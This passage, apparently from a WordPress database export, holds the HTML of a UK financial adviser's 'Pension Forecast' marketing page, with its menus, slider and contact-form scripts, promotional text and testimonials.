src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Blog','Read the latest Financial News, Information and articles from Wealth Management Specialists Equity SMART.','publish','closed','closed','','blog','','','2017-09-21 16:34:35','2017-09-21 16:34:35','',0,'http://www.equalitywalk.org.uk/blog',0,'page','',0),(88,1,'2017-09-21 16:34:36','2017-09-21 16:34:36','<body class=\"page page-id-5581 page-template page-template-100-width-php wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n		<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n	<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n	<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:17px;margin-left:0px;margin-bottom:20px;\">&#13;\n				<a href=\"/\">&#13;\n					<img src=\"../wp-content/uploads/2013/06/RSR4.png\" alt=\"Equity SMART\" class=\"normal_logo\"/></a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-5636\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-5581 current_page_item menu-item-5636\"><a href=\"../pension-forecast/\">Pension Forecast</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n<li id=\"menu-item-24\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-24\"><a href=\"../contact-us/\">Contact</a></li>&#13;\n	</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n						</div>&#13;\n						<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n						<h1 class=\"entry-title\">Pension Forecast</h1>&#13;\n												<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li>Pension Forecast</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n						&#13;\n					<div id=\"main\" class=\"width-100\" style=\"overflow:hidden !important;padding-left:0px;padding-right:0px;\">&#13;\n		<div class=\"avada-row\" style=\"max-width:100%;\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-5581\" class=\"post-5581 page type-page status-publish hentry\">&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<h2 style=\"text-align: center;\"><span style=\"font-size: x-large;\">Pension Forecast – Start your <span style=\"color: #afd9a5;\">FREE Pension Forecast</span> Today</span></h2>&#13;\n<h3 style=\"text-align: center;\">Are you looking to discover if your pensions are performing and on track to meet your retirement goals? If you’re after the fastest, easiest and most secure way to get picture of what your fund will look like in retirement…Your in the right place.&#13;\n<div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px\"/>&#13;\n</h3><p>				&#13;\n				<!-- START REVOLUTION SLIDER 3.0.95 responsitive mode -->&#13;\n				&#13;\n							<style type=\"text/css\"><![CDATA[\r\n				#rev_slider_22_1, #rev_slider_22_1_wrapper { width:940px; height:250px;}\r\n						\r\n			   @media only screen and (min-width: 940px)  {\r\n			 		  #rev_slider_22_1, #rev_slider_22_1_wrapper { width:940px; height:250px;}	\r\n			   }\r\n			\r\n						\r\n			   @media only screen and (min-width: 780px) and (max-width: 939px) {\r\n			 		  #rev_slider_22_1, #rev_slider_22_1_wrapper { width:770px; height:204px;}	\r\n			   }\r\n			\r\n						\r\n			   @media only screen and (min-width: 510px) and (max-width: 779px) {\r\n			 		  #rev_slider_22_1, #rev_slider_22_1_wrapper { width:500px; height:132px;}	\r\n			   }\r\n			\r\n						\r\n			   @media only screen and (min-width: 0px) and (max-width: 509px) {\r\n			 		  #rev_slider_22_1, #rev_slider_22_1_wrapper { width:310px; height:82px;}	\r\n			   }\r\n			\r\n			]]></style></p><div id=\"rev_slider_22_1_wrapper\" class=\"rev_slider_wrapper\" style=\"margin:0px auto;background-color:#E9E9E9;padding:1px;margin-top:0px;margin-bottom:0px;\">&#13;\n					<div id=\"rev_slider_22_1\" class=\"rev_slider\" style=\"display:none;\">						&#13;\n										<ul><li data-transition=\"slotzoom-vertical\" data-slotamount=\"7\" data-masterspeed=\"300\" data-delay=\"9500\">&#13;\n						<img src=\"../wp-content/uploads/2013/06/pension-transfer.jpg\" alt=\"pension-transfer\"/><div class=\"tp-caption big_white fade\" data-x=\"21\" data-y=\"4\" data-speed=\"300\" data-start=\"500\" data-easing=\"easeOutExpo\">CONCERNED ABOUT YOUR PENSION? 					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption big_white fade\" data-x=\"115\" data-y=\"54\" data-speed=\"300\" data-start=\"1500\" data-easing=\"easeOutExpo\">Our pension forecast will help you understand if:					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption medium_grey sfr\" data-x=\"171\" data-y=\"96\" data-speed=\"300\" data-start=\"3500\" data-easing=\"easeOutExpo\">You\'re on track to meet your pension goals					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption medium_grey sfr\" data-x=\"175\" data-y=\"127\" data-speed=\"300\" data-start=\"5500\" data-easing=\"easeOutExpo\">You\'re paying too much in charges					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption medium_grey sfr\" data-x=\"175\" data-y=\"157\" data-speed=\"300\" data-start=\"7500\" data-easing=\"easeOutExpo\">You have under performing pensions					 					 </div>&#13;\n				&#13;\n									</li>&#13;\n									<li data-transition=\"random\" data-slotamount=\"7\" data-masterspeed=\"300\">&#13;\n						<img src=\"../wp-content/uploads/2013/06/bkgd5.jpg\" alt=\"bkgd5\"/><div class=\"tp-caption big_white fade\" data-x=\"91\" data-y=\"28\" data-speed=\"300\" data-start=\"500\" data-easing=\"easeOutExpo\">FREE PENSION FORECAST REVIEW&#13;\n					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption big_white lfr\" data-x=\"89\" data-y=\"86\" data-speed=\"300\" data-start=\"2000\" data-easing=\"easeOutExpo\">Find out if you are on track to meet your retirement<br/> goals with your free, no-obligation pension review 					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption avada_huge_white_text lfb\" data-x=\"88\" data-y=\"173\" data-speed=\"300\" data-start=\"3000\" data-easing=\"easeOutExpo\"><a href=\"../contact-us/\" class=\"button large green\">Get Your FREE Pension Forecast</a>					 					 </div>&#13;\n				&#13;\n									</li>&#13;\n								</ul></div>&#13;\n				</div>				&#13;\n							&#13;\n			<script type=\"text/javascript\"><![CDATA[\r\n\r\n				var tpj=jQuery;\r\n				\r\n									tpj.noConflict();\r\n								\r\n				var revapi22;\r\n				\r\n				tpj(document).ready(function() {\r\n				\r\n				if (tpj.fn.cssOriginal != undefined)\r\n					tpj.fn.css = tpj.fn.cssOriginal;\r\n				\r\n				if(tpj(\'#rev_slider_22_1\').revolution == undefined)\r\n					revslider_showDoubleJqueryError(\'#rev_slider_22_1\');\r\n				else\r\n				   revapi22 = tpj(\'#rev_slider_22_1\').show().revolution(\r\n					{\r\n						delay:9000,\r\n						startwidth:940,\r\n						startheight:250,\r\n						hideThumbs:200,\r\n						\r\n						thumbWidth:100,\r\n						thumbHeight:50,\r\n						thumbAmount:2,\r\n						\r\n						navigationType:\"bullet\",\r\n						navigationArrows:\"solo\",\r\n						navigationStyle:\"round\",\r\n						\r\n						touchenabled:\"on\",\r\n						onHoverStop:\"off\",\r\n						\r\n						navigationHAlign:\"center\",\r\n						navigationVAlign:\"bottom\",\r\n						navigationHOffset:0,\r\n						navigationVOffset:20,\r\n\r\n						soloArrowLeftHalign:\"left\",\r\n						soloArrowLeftValign:\"center\",\r\n						soloArrowLeftHOffset:20,\r\n						soloArrowLeftVOffset:0,\r\n\r\n						soloArrowRightHalign:\"right\",\r\n						soloArrowRightValign:\"center\",\r\n						soloArrowRightHOffset:20,\r\n						soloArrowRightVOffset:0,\r\n								\r\n						shadow:0,\r\n						fullWidth:\"off\",\r\n						fullScreen:\"off\",\r\n\r\n						stopLoop:\"on\",\r\n						stopAfterLoops:0,\r\n						stopAtSlide:2,\r\n\r\n						shuffle:\"off\",\r\n						\r\n						hideSliderAtLimit:0,\r\n						hideCaptionAtLimit:0,\r\n						hideAllCaptionAtLilmit:0,\r\n						startWithSlide:0,\r\n						videoJsPath:\"http://www.equalitywalk.org.uk/wp-content/plugins/revslider/rs-plugin/videojs/\",\r\n						fullScreenOffsetContainer: \"\"	\r\n					});\r\n				\r\n				});	//ready\r\n				\r\n			]]></script><!-- END REVOLUTION SLIDER --><div class=\"one_half\">&#13;\n<div class=\"one_half\"/>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>Is Your Future Financially Secure?</h2><p>We don\'t claim to have a crystal ball and certainly the world has undergone an extreme form of financial stress, which is why knowing if you are on track to meet your retirement goals becomes not a minor benefit, but a crucial necessity for people and pensions of all types and sizes.&#13;\n</p><p> </p>&#13;\n<p>So what does this mean to you?</p>&#13;\n<p> </p>&#13;\n<p>At no time in recorded history has the need for balanced, objective financial advice been more crucial. Which, quite frankly is why you should invest some time with us to get your FREE updated Pension forecast.</p>&#13;\n<p> </p>&#13;\n<p>Our Pension Forecast can help you if you are in a personal pension - final salary company pensions - Self Invested Personal Pension (SIPP) - group personal pension and executive pensions.</p>&#13;\n<p> </p>&#13;\n<p>Call FREE on  or click the link to the right to get your  pension forecast report.</p></section></div>&#13;\n</div>&#13;\n<div class=\"one_half last\"> <div class=\"accordian\"><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>Our pension forecast will determine:</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\">&#13;\n<ul><li>Your current fund size and projected values to your retirement.</li>&#13;\n<li>What your dependents can expect to receive</li>&#13;\n<li>The investment returns needed to meet your goals.</li>&#13;\n<li>The impact of charges on your pension pot.</li>&#13;\n<li>Help you track down missing or lost pensions.</li>&#13;\n<li>Ensure your pension is as tax efficient as it should be.</li>&#13;\n</ul></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>2o years established - that counts in pensions</a></h5><div class=\"toggle-content \" style=\"\">This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our conversation.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise</a></h5><div class=\"toggle-content \" style=\"\">We stand for honesty – advice – trust and value.  Our culture and people matter regarding what you can expect from us. We promise you this the team that makes Investor London work will be centred on you. We believe in treating clients like family, so you can be confident that we’ll give you the same advice we would give to our own relatives.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Pension Forecast can help you if you are in:</a></h5><div class=\"toggle-content \" style=\"\">&#13;\n<ol><li>A Personal Pension – Private pensions in your name, where you pay money in, you receive tax relief on contributions your pay.</li>&#13;\n<li>A Self Invested Pension Transfer if you are looking to take control of your pension funds and make investment decisions.</li>&#13;\n<li>Final Salary pension and are looking to transfer – These pensions are sometimes known as a Defined Benefit Scheme.</li>&#13;\n<li>A Defined Contribution or an Occupational Money Pension. Whereby both you and your employer contribute to your own pension fund.</li>&#13;\n<li>A Group Personal Pension set up and controlled by you employer with no investment choice or flexibility.</li>&#13;\n<li>An Executive Pension that may be set up on an older style of higher charges &amp; fees that are eroding your pensions pot</li>&#13;\n</ol></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Investment Philosophy - Get Rich Slowly</a></h5><div class=\"toggle-content \" style=\"\">We believe in a “Get Rich Slowly” philosophy through a “passive investment” approach to purchasing investments. This we believe is the right choice for the majority of investors who are seeking more peace of mind, when looking to achieve sustained performance over the longer term.&#13;\n<ul><li>Passive investment is the rational, mathematically proven route to investing success.</li>&#13;\n<li>Our investment strategies are focused on your risk profile, well researched, efficient and low maintenance.</li>&#13;\n<li>We look to keep your costs low through longer term appreciation, reduced maintenance and look to avoid unnecessary trading.</li>&#13;\n<li>Ensure you are not over exposed at any time through wide diversification of your asset classes.</li>&#13;\n<li>We provide regular reviews and rebalancing when required or on a 6 monthly or yearly basis.</li>&#13;\n</ul></div></div>&#13;\n<div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button large e.g. green\" href=\"#standard\" target=\"\">Get Your Pension Forecast</a></div><div class=\"clearboth\"/></div></div>&#13;\n<div class=\"fullwidth-box\" style=\"background-color:#f4f4f4;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:10px;padding-bottom:1px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><div class=\"title\"><h1>Get Your Pension Forecast in 4 Easy Steps</h1><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div><div class=\"demo-sep sep-none\" style=\"margin-top:45px;\"/>&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#content-boxes-1 article.col{background-color:#ffffff !important;}\r\n		#content-boxes-1 .fontawesome-icon.circle-yes{color:#ffffff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed\" id=\"content-boxes-1\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Contact us today</h2></div><div class=\"col-content-container\">Get in touch to find out how we can be of service. It’s confidential  and we provide you with the highest level of consumer protection when it comes to your pension.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Prepare A Forecast</h2></div><div class=\"col-content-container\">We’ll get to know you, your specific needs and your financial circumstances to allow us to analyse and report back, allowing you to make better and more informed decisions.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Explain Options</h2></div><div class=\"col-content-container\">We’ll explain all the options available to you, discuss both the pros &amp; the cons and then make a  written pension forecast. We have your best interests at heart.</div></article><article class=\"col last\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-ok\"/><h2>If You Proceed</h2></div><div class=\"col-content-container\">All the paperwork is arranged for you and processed quickly &amp;amp; efficiently. Throughout this process we’ll always be in touch, keeping  you in the loop and up to date.</div></article></section><style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#ffffff !important;border-width:0px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><a href=\"#standard\" target=\"\" class=\"continue button large default\">Book Now</a><h2>It’s all so simple. To book a chat with our pension forecast expert, click the link.</h2><p>It\'s free, and we think you\'ll like what you hear.<a href=\"#standard\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></p></section></div></div></div><div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:18px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<div class=\"title\"><h2>Kind Words &amp; Praise</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n<div class=\"one_half\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-1\" class=\"reviews clearfix\"/> <div class=\"review male\"><blockquote><q>“Very pleased with the service provided. Highly professional and standard of information provided was very comprehensive. I was kept informed at all stages of the process.”</q><div class=\"clearfix\"><span class=\"company-name\">Stephen McCoy,</span></div></blockquote></div></div>&#13;\n<div class=\"one_half last\"><style type=\"text/css\"><![CDATA[\r\n		#testimonials-2 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-2 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-2\" class=\"reviews clearfix\"> <div class=\"review male\"><blockquote><q>“I found the staff who I personally dealt with very friendly helpful and professional and the people on the other side of the phone exceptionally friendly too.”</q><div class=\"clearfix\"><span class=\"company-name\">M Patterson,</span></div></blockquote></div> </div>&#13;\n</div><div class=\"clearboth\"/>&#13;\n<p>We Compare All The Leading Pension Release Providers. Here are a Few You Might Recognise:</p>&#13;\n<div class=\"related-posts related-projects \"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"\" target=\"\"><img src=\"../wp-content/uploads/2013/05/axa.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"../wp-content/uploads/2013/05/aegon.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"../wp-content/uploads/2013/05/aviva.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"../wp-content/uploads/2013/05/friendslife.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"../wp-content/uploads/2013/05/Standard_Life_logo1.png\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"../wp-content/uploads/2013/05/legal-and-general.gif\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"../wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-3 .tagline-shadow:before,#reading-box-container-3 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container\" id=\"reading-box-container-3\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:0px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><a href=\"#standard\" target=\"\" class=\"continue button large default\">Book Now</a><h2>It’s all so simple. To book a chat with our pension forecast expert, click the link.</h2><p>It\'s free, and we think you\'ll like what you hear.<a href=\"#standard\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></p></section></div><a id=\"iphorm_fancybox_524ab776efd7c\" class=\"iphorm-fancybox-link iphorm-fancybox-link-1\" href=\"#\"/>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n<!--\r\n    jQuery(document).ready(function ($) {\r\n        var $link = $(\'#iphorm_fancybox_524ab776efd7c\');\r\n        if ($.isFunction($.fn.fancybox) && !$link.data(\'iphorm-initialised\')) {\r\n            $link.fancybox($.extend({\r\n                inline: true,\r\n                href: \'#iphorm-outer-524ab776ede3a\',\r\n                onStart: function () {\r\n                    $(\'#fancybox-outer\').css(\'opacity\', 0);\r\n                },\r\n                onComplete: function () {\r\n                    $(\'#fancybox-wrap, #fancybox-content\').css({width: \'auto\'});\r\n                    $.fancybox.center(0);\r\n                    setTimeout(function () {\r\n                        $(\'#fancybox-outer\').animate({opacity: 1}, 400);\r\n                        $(\'#fancybox-overlay\').css({height: $(document).height()});\r\n                    }, 1);\r\n                }\r\n            }, {})).data(\'iphorm-initialised\', true);\r\n        }\r\n    });\r\n//-->\r\n]]></script><div style=\"display: none;\">&#13;\n<div id=\"iphorm-outer-524ab776ede3a\" class=\"iphorm-outer iphorm-outer-1 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-524ab776ede3a\').iPhorm({\"id\":1,\"uniqueId\":\"524ab776ede3a\",\"PHPSESSID\":\"c9eec9064d9f819eb72092d5f2b18daa\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: 